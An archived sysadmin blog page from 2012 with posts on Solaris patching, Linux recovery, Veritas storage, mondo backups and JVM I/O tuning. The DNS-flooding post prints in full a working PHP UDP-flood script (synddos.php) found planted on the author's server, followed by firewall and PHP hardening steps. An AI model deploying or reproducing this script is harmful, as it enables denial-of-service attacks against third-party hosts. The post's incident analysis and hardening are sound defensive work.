Archive

Archive for April, 2012

method to start stop SUNWwbsvr webservd Sun webserver

April 28th, 2012 No comments

Here's steps to start Sun webserver:

cd /apps/SUNWwbsvr/<https-tag-of-your-hostname>

./start

Here's steps to stop Sun webserver:

cd /apps/SUNWwbsvr/<https-tag-of-your-hostname>

./stop

To check whether start/stop/restart completes:

ps -ef | grep SUNWwbsvr

resolved pca 403 forbidden server error on solaris

April 28th, 2012 No comments

Today when I was patching a solaris 5.9 host, error occurred with error message as follows after entering MOS(my oracle support) user/password:

122300 56 < 63 RS- 22 SunOS 5.9: Kernel Patch
Looking for 122300-63 (2/52)
Trying Oracle
Please enter My Oracle Support Account User: test@doxer.org
Please enter My Oracle Support Account Password:
Trying https://getupdates.oracle.com/ (zip) (1/1)
Failed (Error 403: Forbidden)
Failed (patch not found)

Then I went to http://support.oracle.com and searched patch 122300-63. The patching info page says I'll need "Vintage Solaris download access/privilege" to download this patch, but obviously none of my CSI had this Vintage Solaris download access/privilege.

As this account issue may take some time to resolve, so I choose cluster patch or you may say patchset method to do the patching on solaris 9. Here's the steps we need to do cluster patching on solaris 5.9:

  • 1.download latest cluster patching package that satisfies your host here http://wesunsolve.net/bundles
  • 2.unzip the package and have a read of Recommended.README file comes with the package
  • 3.ensure there's enough free space on /, /var(better >4Gb)
  • 4. Now run ./install_patchset or ./install_cluster(you can add -nosave parameter if  you have limited free space on /, /var, but you will not be able to backout individual patches if the need arises)
  • 5.For more installation messages refer to the installation logfile:    /var/sadm/install_data/<patchset-name>_log
  • 6.reboot your machine to make all patches applied to your host.

NB:

If you have raid 1(mirror) on your solaris system, you can try first patch submirror and then apply to all system if server runs well after booting up. You can refer to the following for more infomation:

http://www.doxer.org/solaris-patching-trick-%E2%80%93-first-patch-submirror-then-sync-between-mirrors/

 

linux failed booting up caused by filesystem failures corrupted

April 25th, 2012 No comments

We had a linux system which failed booting up caused by filesystem corrupted.

  • 1.When tried booting from single user mode, it prompt "enter root password and repair the FS". We knew it's filesystem /apps/kua got broken which caused the issue, but fack /apps/kua failed.
  • 2.Now, we tried booting up without the corrupted /apps/kua(seems this is a tricky one in RHCE). After commented out /apps/kua from /etc/fstab, it got a "read only" error. We tried mount -o rw,remount /, but it still didn't work.
  • 3.Finally we thought of the rescue cd. After commented out /apps/kua from /etc/fstab, system finally booted up. It automatically updated selinux policy related. Now the only things left would be backup contents under /apps/kua, then make a new partition mounted under /apps/kua, and at last copy back contents to the newly created partiton.

PS:
Actually, this problem may be resolved by mounting with an alternative superblock. More details can be found here:

http://www.cyberciti.biz/tips/mounting-with-an-alternative-superblock.html

http://www.cyberciti.biz/tips/surviving-a-linux-filesystem-failures.html

Categories: Hardware, IT Architecture, Linux, Storage, Systems Tags:

about lazy umount -l

April 19th, 2012 No comments

If you're running netbackup to backup data to tapes, and you find that some netbackup jobs hang there. You may want to umount filesystems netbackup is using to release these jobs.

But a small note here:

umount -l(Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore) will not kill NB job. umount -l is potentially dangerous and I would discourage its use unless it's clearly the only way forward, certainly not something we would want to put in a script.

Essentially it marks the filesystem as unmounted, effectively blocking any new processes from accessing it, but all processes that already have handles opened can still traverse directories, write and read the files etc. This means mounting this filesystem again in the same location will create a situation when
a) data in the backup is not consistent (some data from old bcv snapshot, some from the newer one)
b) metadata is corrupted (eventually it will umount the FS once the first NB process ends, and put this into superblock; next umount will likely fail to handle this).
Worst of all, this will mask the issue instead of resolving it so I agree that we should chase netbackup team for correct resolution.

Categories: Hardware, Storage Tags:

mondo linux backup

April 17th, 2012 No comments

Backup Procedure

#1. Install mondo RPM packages and dependancies
#1.1 Install mkisofs and cdrecord from SpaceWalk
yum -y install mkisofs cdrecord
#1.2 Install mondo packages from RPMs
rpm -ivh afio-2.5-2.el5.rf.x86_64.rpm \
buffer-1.19-2.el5.rf.x86_64.rpm \
mindi-2.1.0-1.rhel5.x86_64.rpm \
mindi-busybox-1.18.5-1.rhel5.x86_64.rpm \
mondo-3.0.0-1.rhel5.x86_64.rpm

#2. Make mondo scratch, tmp & run directories
#2.1 Check if <mondo_fs> has 1.5GB available
df -h <mondo_fs> #i.e. If mondo to run on /usr -> df -h /usr
#2.2 Make directories <mondo_fs>/mondo/tmp, <mondo_fs>/mondo/scratch, <mondo_fs>/mondo/run
mkdir -p <mondo_fs>/mondo/tmp <mondo_fs>/mondo/scratch <mondo_fs>/mondo/run

#3. Mount ISO repository
#3.1 Trigger automount of ISO repository or mount NFS
cd /share/BuildISOs/Redhat #or, mount amsnfs:/export/software/BuildISOs <mountpoint>

#4. Run mondoarchive
#4.1 mondoarchive -O [ options ] : backup your PC
mondoarchive -O -i -p `uname -n` -N -d /share/BuildISOs/Redhat/`uname -n`/iso \
-T <mondo_fs>/mondo/tmp -S <mondo_fs>/mondo/scratch -s 4480m \
> <mondo_fs>/mondo/run/mondo-`uname -n`.output 2>&1

Then patch OS

#6. Remove mondo packages and directories installed & created in 1 & 2.
#6.1 Remove mkisofs, cdrecord & mondo packages.
rpm -e mkisofs cdrecord afio buffer mindi mindi-busybox mondo

#6.2 Remove <mondo_fs> scratch, tmp & run directories.
rm -r <mondo_fs>/mondo/tmp <mondo_fs>/mondo/scratch <mondo_fs>/mondo/run
Mondo Backout Procedure

#7. Boot from mondo ISO
#7.1 Mount mondo ISO on ilo or VMWare console
#7.2 Reboot server and set CDROM first in boot order
#7.3 Select default boot options
#7.4 Exit mondorestore after completion

#8. Reboot
#8.1 Unmount ISO
#8.2 Reboot

 

Categories: IT Architecture, Linux, Systems Tags:

resolved – port 53 dns flooding attack

April 13th, 2012 No comments

I found this port 53 dns flooding attack when the server became very unsteady. NIC was blipping and networking just went down without OS rebooting.

Using ntop as detector, I found the issue with DNS traffic was at a very high level(about 3Gb traffic). Then I determined to forbid DNS traffic, and only allow some usual ports.

  • Disable autoboot of iptables in case there's something wrong with iptables

mv /etc/rc3.d/S08iptables /etc/rc3.d/s08iptables

  • here's the rules

[root@doxer ~]# cat iptables-stop-flood.sh

#!/bin/bash
iptables -F

#Note that DROP is different than REJECT. REJECT will return error to client(telnet will return Connection refused from client), but DROP will just drop the packet(telnet will hang Trying and return Connection timed out).
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo - allow no more than 5 new connections per second
#iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state --state INVALID -j DROP

#Allow ftp, http, mysql
#todo - if there's no -m, than --dport or --sport must be in a range
#todo - --ports source and destination ports are assumed to be the same
iptables -A INPUT -p tcp -m multiport --dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing httpd like telnet doxer 80
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport --dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dport 3000 -j ACCEPT

#Allow sftp
iptables -A INPUT -p tcp --dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 115 -j ACCEPT

#Allow outgoing ssh
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp --dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --dport 873 -j ACCEPT

#allow ftp passive mode(you need set vsftpd first)
iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 35000:37000 -j ACCEPT

#Allow ping & nslookup. reply is 8, request is 0
#allow other hosts to ping
iptables -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT
#allow this host ping others
iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT

#allow dns query
#iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
#iptables -A INPUT -p udp --sport 53 -j ACCEPT
#iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT
#iptables -A INPUT -p tcp --sport 53 -j ACCEPT

# Allow local loopback services
iptables -A INPUT -i lo -j ACCEPT

#save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart

  • run the rules

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • enable autoboot of iptables
If everything is ok, enable autoboot of iptables:
mv /etc/rc3.d/s08iptables /etc/rc3.d/S08iptables

After all these steps, dns traffic now dropped to normal status.

NB:

After several days' investigation, I finally found out that this attack was source from some worms(php worms?) embedded in dedecms's directory. Here's one file called synddos.php:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Warning to: opening";
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}

$max_time = time()+$exec_time;

while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

This is crazy! That explains the reason why there was so much DNS traffic out!

To cure this weakness:

1.disable fsockopen function in php.ini

disable_functions = fsockopen

2.in .htaccess file, limit php scripts from running

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*).(php)$ - [F]
RewriteRule data/(.*).(php)$ - [F]
RewriteRule templets/(.*).(php)$ - [F]

solaris svm breaking need boot from mirror

April 11th, 2012 No comments

If solaris's svm has broken, and that broken one is for rootdisk, then the system will fail to boot up. We can now try boot from mirror disk rather than SVM. If the mirror is in good condition, then your system will boot up and after it's up, we can do something to repair the broken solaris svm.

Here goes the steps to boot solaris from mirror disk without svm:

1.Prepare a cd/dvd with solaris of your host's version.

2.goto ok mode

3.ok> boot cdrom -s ( Or boot net -s)

4.mount the root slice on /a

5.Take backup of /a/etc/vfstab and /a/etc/system files.

6.Modify the entries of the vfstab files and system files of /etc

7.Edit the /a/etc/system file, and remove the "rootdev" line shown below:

# vi /a/etc/system
*rootdev:/pseudo/md@0:0,0,blk #yours may be different
------> Do not comment the line. Remove it.

8.In the /etc/vfstab file, replace the lines for the system file system
metadevices with their underlying partitions.

For example, change lines from:

/dev/md/dsk/d0 /dev/md/rdsk/d0 / ufs 1 no -

to:

/dev/dsk/c0t0d0s0 /dev/rdsk/c0t0d0s0 / ufs 1 no -

ONLY change the lines for root (/) and the file systems which were affected. All other metadevices, may stay 'as is', in this file.

9.Unmount and check the root file system.

# cd /
# umount /a
# fsck /dev/rdsk/c0t0d0s0

10.#/usr/sbin/installboot /usr/platform/`uname -i`/lib/fs/ufs/bootblk /dev/rdsk/cXtXdXs0

[

If you are using a cd/dvd or net which is having advance version of the Solaris OS to
the Solaris OS on the disk to boot to single user, then install the bootblk using the following command.

#/a/usr/sbin/installboot /a/usr/platform/`uname -i`/lib/fs/ufs/bootblk /dev/rdsk/cXtXdXs0

]

11.init 0

12.Boot from the mirror disk.
Ok boot disk0

PS:

You can find more info if you search for "Unable to boot from a DiskSuite-controlled system disk" in google.

solaris kernel bug – ack replied before sync/ack valid outbound packets dropped

April 9th, 2012 No comments

If you intermittently getting the following error “ldapserver.test.com:389; socket closed.” , and after some tcpdumping you may find the following:

From the network traffic analysing you may find the following incorrect package exchange chain exists:

testhost1 -- > testhost2 (SYN)
testhost1 < -- testhost2 (ACK) -- on this point should be sent SYN ACK package
testhost1 -- > testhost2 (RST) - respectively in case when it didn't receive SYN/ACK – client initiate reset TCP connection

Actually this is a solaris kernel bug, more info you can refer to
The workaround is running this:
ndd -set /dev/ip ip_ire_arp_interval 999999999
After this, the packet drop to 1 per week per host.

More info about this kernel bug can be found here http://wesunsolve.net/bugid/id/6942436

re-initialize veritas devices layouts

April 6th, 2012 No comments

If you found inconsistent paths on your vxfs based filesystem, you may consider re-initialize veritas devices layouts, i.e. remove all rdmp and dmp entries from /etc/vx/dmp and /etc/vx/rdmp and recreate them later.

---Prior starting of implementation freeze VCS cluster on each node

hasys -freeze testhost

---kill vxconfigd #This step is especially not required on Solaris 10 with VxVM5.0. Kill the vxconfigd daemon - Note "-k" argument is not killing it is restarting

# kill -9 <pid of vxconfigd>

---Stop the eventsource daemon

# vxddladm stop eventsource

---Remove all rdmp and dmp entries from /etc/vx/dmp and /etc/vx/rdmp

---Move /etc/vx/array.info to something like /etc/vx/array.info.old

---repeat 3 for /etc/vx/jbod.info or /etc/vx/disk.info #optional

You may need to make changes to the underlying storage layer - if part of your issue does include device path confusion in the underlying os layer. Run your cfgadm or devfsadm -C  (as for solaris) or whatever as required to get your OS understanding of devices in the state you want (There are many things that can be done which might seem extreme or risky and require a sound knowledge of device configuration too large to include here but a decently current OS would not normally require a boot to address such issues as these - that said it may sometimes be more expedient to do so anyway).

---start vxconfigd if you had to kill it in step 1 

# vxconfigd -x syslog -m boot

You wait a minute for it to return or just nohup it in the first place

---Scan disks

#vxdisk scandisks

---Enable dmp

#vxdctl enable

---Once everything verified with test plan you need to unfreeze vcs

hasys -unfreeze testhost

 

vxfs extending filesystems using luns from EMC DMX3-24 array

April 6th, 2012 No comments

This article is going to show a howto about vxvm extending filesystems using luns from EMC DMX3-24 array(HP-UX).

First, zoning and mapping on SAN switches.(the part will not be shown in this article)

Now imagine you already got LUNs 23AB allocated from DMX array to this host, here's the steps to adding it to the OS and extending vxfs based filesystem.

--Prepare work
ioscan -fknC disk > /var/tmp/ioscan_before
syminq -pdevfile > /var/tmp/syminq_before
vxdisk -o alldgs list > /var/tmp/alldgs_before
vxdisk -e list > /var/tmp/vxdisk_before
vxprint -Aht > /var/tmp/vxprint_before
bdf -l > /var/tmp/bdf_before

--Scan LUNs

# ioscan -fnC disk
# insf -e -C disk #force device creation,after this you see the new LUN
#syminq -pdevfile | grep 23AB #and other LUNs in attached excel files should be visible to the host now

NOTE: The output of syminq -pdevfile|grep 23AB will be like the following if your OS has 2 paths:

000290101888(symantec id, i.e. sid) /dev/rdsk/c50t4d5     23AB  8B 1

000290101888(symantec id, i.e. sid) /dev/rdsk/c51t4d5     23AB  9C 0

# symcfg disco #This operation may take up to a few minutes. Please be patient
# sympd list | grep -i 23AB #and other LUNs in attached excel files should be visible to the host now

NOTE: The output of sympd list | grep -i 23AB will be like the following if your OS has 2 paths:

/dev/rdsk/c50t4d5      23AB 08B:1 12C:D2  RAID-5        N/Grp'd      RW   34560

/dev/rdsk/c51t4d5      23AB 09C:0 12C:D2  RAID-5        N/Grp'd      RW   34560

# vxdctl enable

NOTE: after this step, you'll see the DMP device for 23AB using syminq -pdevfile|grep 23AB:

000290101912 /dev/rdsk/c50t4d5 23AB 8B 1
000290101912 /dev/rdsk/c51t4d5 23AB 9C 0
000290101912 /dev/vx/rdmp/EMC1_68 23AB 8B 1

# vxdisk -e list
# symcfg disco

NOTE: after this step, you'll see the DMP device for 23AB using sympd list|grep 23AB:

#sympd list | grep -i 23AB

/dev/vx/rdmp/EMC1_68 23AB 08B:1 12C:D2 RAID-5 N/Grp'd RW 34560

/dev/rdsk/c50t4d5      23AB 08B:1 12C:D2  RAID-5        N/Grp'd      RW   34560

/dev/rdsk/c51t4d5      23AB 09C:0 12C:D2  RAID-5        N/Grp'd      RW   34560

--Add new LUNs to Volume 

# /etc/vx/bin/vxdisksetup -i EMC1_68

Note: before vxdisksetup, the disk will be like:

# vxdisk list EMC1_68
Device: EMC1_68
devicetag: EMC1_68
type: auto
info: format=none
flags: online ready private autoconfig invalid
pubpaths: block=/dev/vx/dmp/EMC1_68 char=/dev/vx/rdmp/EMC1_68
Multipathing information:
numpaths: 2
c50t4d5 state=enabled
c51t4d5 state=enabled

And after vxdisksetup, the disk will be like:

# vxdisk list EMC1_68
Device: EMC1_68
devicetag: EMC1_68
type: auto
hostid:
disk: name= id=1333677433.174.testhost
group: name= id=
info: format=cdsdisk,privoffset=128
flags: online ready private autoconfig autoimport
pubpaths: block=/dev/vx/dmp/EMC1_68 char=/dev/vx/rdmp/EMC1_68
version: 3.1
iosize: min=512 (bytes) max=1024 (blocks)
public: slice=0 offset=1152 len=35386368 disk_offset=0
private: slice=0 offset=128 len=1024 disk_offset=0
update: time=1333677433 seqno=0.1
ssb: actual_seqno=0.0
headers: 0 120
configs: count=1 len=640
logs: count=1 len=96
Defined regions:
config priv 000024-000119[000096]: copy=01 offset=000000 disabled
config priv 000128-000671[000544]: copy=01 offset=000096 disabled
log priv 000672-000767[000096]: copy=01 offset=000000 disabled
lockrgn priv 000768-000839[000072]: part=00 offset=000000
Multipathing information:
numpaths: 2
c50t4d5 state=enabled
c51t4d5 state=enabled

# vxdg -g DgNameOfYours adddisk emc23AB=23AB

--Extent FS

vxassist -g DgNameOfYours maxgrow YourUnderLyingVolume #the output will be "Volume YourUnderLyingVolume  can be extended by X to: Y"

/etc/vx/bin/vxresize -g DgNameOfYours -F vxfs -bx YourUnderLyingVolume +<X>

After this step, both underlying YourUnderLyingVolume and the OS filesystem will be extended.(this is because vxresize will increase automatically both volume and certain types of filesystems)

threads high on JVM due to I/O bottleneck

April 6th, 2012 No comments

I/O seems always a bottleneck to applications. And sometimes moving from hard drive to RAM disk is a good idea as the latter one is much more efficient than former.

Let's go analysing one stack trace of a blocked thread:

 

Thread "WebContainer : 1103": acquiring monitor java.util.HashSet owned by WebContainer : 1009 (0:00:03.769)
com.vgn.ext.templating.cache.BaseObjectCache.putVariation (BaseObjectCache.java:352, bci=121, server compiler)
blocked on java.util.HashSet (0x000000c9d5e606d0)
com.vgn.ext.templating.cache.BaseObjectCache.putRenderedManagedObject (BaseObjectCache.java:329, bci=36, server compiler)
com.foundation.dp.V7ObjectCache.putRenderedManagedObject (V7ObjectCache.java:372, bci=458, server compiler)
com.vgn.ext.templating.util.RenderUtil.renderContentItem (RenderUtil.java:249, bci=657, server compiler)
com.vgn.ext.templating.util.RenderUtil.renderRegionContent (RenderUtil.java:533, bci=79, server compiler)
com.vgn.ext.templating.taglib.ContentRegionTagSupport.renderRegion (ContentRegionTagSupport.java:626, bci=63, server compiler)
com.vgn.ext.templating.taglib.ContentRegionTagSupport.doStartTag (ContentRegionTagSupport.java:672, bci=180, server compiler)
com.ibm._jsp._contentRegion._jspService (_contentRegion.java:148, bci=561, server compiler)
com.ibm.ws.jsp.runtime.HttpJspBase.service (HttpJspBase.java:87, bci=3, server compiler)
javax.servlet.http.HttpServlet.service (HttpServlet.java:856, bci=30, server compiler)
com.ibm.ws.webcontainer.servlet.ServletWrapper.service (ServletWrapper.java:1146, bci=248, server compiler)
com.ibm.ws.webcontainer.servlet.ServletWrapper.handleRequest (ServletWrapper.java:592, bci=1071, server compiler)
com.ibm.ws.wswebcontainer.servlet.ServletWrapper.handleRequest (ServletWrapper.java:525, bci=510, server compiler)
com.ibm.wsspi.webcontainer.servlet.GenericServletWrapper.handleRequest (GenericServletWrapper.java:122, bci=6, server compiler)
com.ibm.ws.jsp.webcontainerext.AbstractJSPExtensionServletWrapper.handleRequest (AbstractJSPExtensionServletWrapper.java:232, bci=539, server compiler)
com.ibm.ws.webcontainer.webapp.WebAppRequestDispatcher.include (WebAppRequestDispatcher.java:639, bci=704, server compiler)
com.vgn.ext.templating.portal.taglib.VAPIncludeTag.doStartTag (VAPIncludeTag.java:147, bci=562, server compiler)
com.ibm._jsp._view._jspx_meth_page_include$1page_0 (_view.java:455, bci=41, server compiler)
com.ibm._jsp._view._jspService (_view.java:231, bci=1038, server compiler)

From here we can conclude that the thread is waiting to acquire lock necessary before it attempts to put some rendered object.

Here's a stack trace of the running active thread:

Thread "WebContainer : 947": running
java.io.FileOutputStream.writeBytes (native method)
java.io.FileOutputStream.write (FileOutputStream.java:278, bci=4, server compiler)
java.io.ObjectOutputStream$BlockDataOutputStream.drain (ObjectOutputStream.java:1690, bci=36, server compiler)
java.io.ObjectOutputStream$BlockDataOutputStream.setBlockDataMode (ObjectOutputStream.java:1599, bci=14, server compiler)
java.io.ObjectOutputStream.writeObject0 (ObjectOutputStream.java:1090, bci=540, server compiler)
java.io.ObjectOutputStream.writeObject (ObjectOutputStream.java:307, bci=16, server compiler)
java.util.HashSet.writeObject (HashSet.java:254, bci=66, server compiler)
sun.reflect.GeneratedMethodAccessor208.invoke (unknown source, bci=40, server compiler)
sun.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:25, bci=6, server compiler)
java.lang.reflect.Method.invoke (Method.java:585, bci=111, server compiler)
java.io.ObjectStreamClass.invokeWriteObject (ObjectStreamClass.java:917, bci=20, server compiler)
java.io.ObjectOutputStream.writeSerialData (ObjectOutputStream.java:1344, bci=79, server compiler)
java.io.ObjectOutputStream.writeOrdinaryObject (ObjectOutputStream.java:1295, bci=64, server compiler)
java.io.ObjectOutputStream.writeObject0 (ObjectOutputStream.java:1084, bci=506, server compiler)
java.io.ObjectOutputStream.defaultWriteFields (ObjectOutputStream.java:1380, bci=115, server compiler)
java.io.ObjectOutputStream.writeSerialData (ObjectOutputStream.java:1352, bci=125, server compiler)
java.io.ObjectOutputStream.writeOrdinaryObject (ObjectOutputStream.java:1295, bci=64, server compiler)
java.io.ObjectOutputStream.writeObject0 (ObjectOutputStream.java:1084, bci=506, server compiler)
java.io.ObjectOutputStream.writeObject (ObjectOutputStream.java:307, bci=16, server compiler)
com.vgn.ext.templating.cache.DefaultObjectCache.addFile (DefaultObjectCache.java:356, bci=173, server compiler)
com.vgn.ext.templating.cache.DefaultObjectCache.putSimpleObject (DefaultObjectCache.java:1098, bci=91, server compiler)
com..foundation.dp.V7ObjectCache.putSimpleObject (V7ObjectCache.java:797, bci=36, server compiler)
com.vgn.ext.templating.cache.BaseObjectCache.putVariation (BaseObjectCache.java:366, bci=246, server compiler)
locked java.util.HashSet (0x000000c94019b9c8)
com.vgn.ext.templating.cache.BaseObjectCache.putRenderedManagedObject (BaseObjectCache.java:329, bci=36, server compiler)
com..foundation.dp.V7ObjectCache.putRenderedManagedObject (V7ObjectCache.java:372, bci=458, server compiler)
com.vgn.ext.templating.util.RenderUtil.renderContentItem (RenderUtil.java:249, bci=657, server compiler)
com.vgn.ext.templating.util.RenderUtil.renderRegionContent (RenderUtil.java:533, bci=79, server compiler)

We can conclude that active threads are attempting disk IO and are getting stuck in the write() syscall for a considerable amount of time. So let's went to the host to check I/O states:

root@doxer# iostat -xn
extended device statistics
r/s w/s kr/s kw/s wait actv wsvc_t asvc_t %w %b device
21.9 189.6 68.7 5433.3 1.0 1.6 4.9 7.4 9 47 testserver:/cache
9.0 421.7 229.3 13280.8 0.2 1.1 0.4 2.7 3 64 testserver:/cache
4.0 510.7 82.3 16310.0 0.5 1.5 0.9 2.9 7 62 testserver:/cache
14.1 692.6 190.3 21625.8 1.0 2.6 1.4 3.7 15 73 testserver:/cache
19.0 747.1 219.5 23096.4 1.7 3.5 2.2 4.6 22 74 testserver:/cache
1.0 392.0 25.9 12433.3 0.0 0.6 0.0 1.6 1 55 testserver:/cache
5.0 417.9 97.9 13284.8 0.1 0.9 0.2 2.1 2 58 testserver:/cache
7.0 425.9 186.5 13368.8 0.2 1.3 0.4 2.9 4 67 testserver:/cache
4.0 537.1 55.8 17002.2 1.0 1.7 1.9 3.1 10 65 testserver:/cache
11.0 911.0 110.6 28490.8 2.4 4.1 2.6 4.4 29 76 testserver:/cache
7.0 377.4 110.0 11897.0 0.0 1.0 0.0 2.5 1 63 testserver:/cache
3.0 597.9 28.9 18825.1 0.7 1.9 1.2 3.2 12 60 testserver:/cache
1.0 502.0 25.2 15639.9 0.3 1.3 0.6 2.6 7 55 testserver:/cache
1.0 495.0 22.5 15739.3 1.1 1.8 2.3 3.7 12 64 testserver:/cache
9.9 555.2 114.1 17626.5 0.9 2.2 1.6 3.9 12 67 testserver:/cache
21.1 747.8 61.4 22946.8 5.1 3.4 6.6 4.4 24 77 testserver:/cache
6.0 794.8 130.4 25325.1 2.1 3.7 2.7 4.7 27 69 testserver:/cache
8.0 646.6 53.6 20225.4 1.4 2.5 2.2 3.8 17 65 testserver:/cache
7.0 380.3 157.4 12112.6 0.0 0.9 0.0 2.4 1 64 testserver:/cache
10.0 398.9 127.1 12610.9 0.1 1.1 0.2 2.7 2 68 testserver:/cache
10.0 843.4 94.1 26200.1 1.9 3.7 2.2 4.3 26 74 testserver:/cache
6.0 464.0 31.6 14471.7 0.4 1.5 0.8 3.2 6 63 testserver:/cache
0.0 619.0 0.0 19693.2 1.1 2.2 1.8 3.5 14 60 testserver:/cache
6.0 641.0 136.3 19917.7 1.3 2.6 2.0 4.0 18 70 testserver:/cache

Pretty heavy and with clear pattern! No other disks had any writes at all except for NFS share. If we changed the cache from NFS to tmpfs, this will improve write speeds dramatically.

PS:

Solaris' iostat utility has been extended to report I/O statistics on NFS mounted filesystems, in addition to its traditional reports on disk, tape I/O, terminal activity, and CPU utilization. The iostat utility helps you measure and monitor performance by providing disk and network I/O throughput, utilization, queue lengths and response time.

The -xn directives instruct iostat to report extended disk statistics in tabular form, as well as display the names of the devices in descriptive format (for example, server:/export/path). The following example shows the output of iostat -xn 20 during NFS activity on the client, while it concurrently reads from two separate NFS filesystems. The server assisi is connected to the same hub to which the client is connected, while the test server paris is on the other side of the hub and other side of the building network switches. The two servers are identical; they have the same memory, CPU, and OS configuration:

Code View: Scroll / Show All

% iostat -xn 20
...
extended device statistics
r/s w/s kr/s kw/s wait actv wsvc_t asvc_t %w %b device
0.0 0.1 0.0 0.4 0.0 0.0 0.0 3.6 0 0 c0t0d0
0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0 0 fd0
0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0 0 rome:vold(pid239)
9.7 0.0 310.4 0.0 0.0 3.3 0.2 336.7 0 100 paris:/export
34.1 0.0 1092.4 0.0 0.0 3.2 0.2 93.2 0 99 assisi:/export

 

The iostat utility iteratively reports the disk statistics every 20 seconds and calculates its statistics based on a delta from the previous values. The first set of statistics is usually uninteresting, since it reports the cumulative values since boot time. You should focus your attention on the following set of values reporting the current disk and network activity. Note that the previous example does not show the cumulative statistics. The output shown represents the second set of values, which report the I/O statistics within the last 20 seconds. The first two lines represent the header, then every disk and NFS filesystem on the system is presented in separate lines. The first line reports statistics for the local hard disk c0t0d0. The second line reports statistics for the local floppy disk fd0. The third line reports statistics for the volume manager vold. In Solaris, the volume manager is implemented as an NFS user-level server. The fourth and fifth lines report statistics for the NFS filesystems mounted on this host. Included in the statistics are various values that will help you analyze the performance of the NFS activity:

r/s
Represents the number of read operations per second during the time interval specified. For NFS filesystems, this value represents the number of times the remote server was called to read data from a file, or read the contents of a directory. This quantity accounts for the number of read, readdir, and readdir+ RPCs performed during this interval. In the previous example, the client contacted the server assisi an average of 34.1 times per second to either read the contents of a file, or list the contents of directories.

w/s
Represents the number of write operations per second during the time interval specified. For NFS filesystems, this value represents the number of times the remote server was called to write data to a file. It does not include directory operations such as mkdir, rmdir, etc. This quantity accounts for the number of write RPCs performed during this interval.

kr/s
Represents the number of kilobytes per second read during this interval. In the preceding example, the client is reading data at an average of 1,092.4 KB/s from the NFS server assisi. The optional -M directive would instruct iostat to display data throughput in MB/sec instead of KB/sec.

kw/s
Represents the number of kilobytes written per second during this interval. The optional -M directive would instruct iostat to display data throughput in MB/sec.

wait
Reports the average number of requests waiting to be processed. For NFS filesystems, this value gets incremented when a request is placed on the asynchronous request queue, and gets decreased when the request is taken off the queue and handed off to an NFS async thread to perform the RPC call. The length of the wait queue indicates the number of requests waiting to be sent to the NFS server.
actv
Reports the number of requests actively being processed (i.e., the length of the run queue). For NFS filesystems, this number represents the number of active NFS async threads waiting for the NFS server to respond (i.e., the number of outstanding requests being serviced by the NFS server). In the preceding example, the client has on average 3.2 outstanding RPCs pending for a reply by the server assisi at all times during the interval specified. This number is controlled by the maximum number of NFS async threads configured on the system. Chapter 18 will explain this in more detail.
wsvc_t
Reports the time spent in the wait queue in milliseconds. For NFS filesystems, this is the time the request waited before it could be sent out to the server.
asvc_t
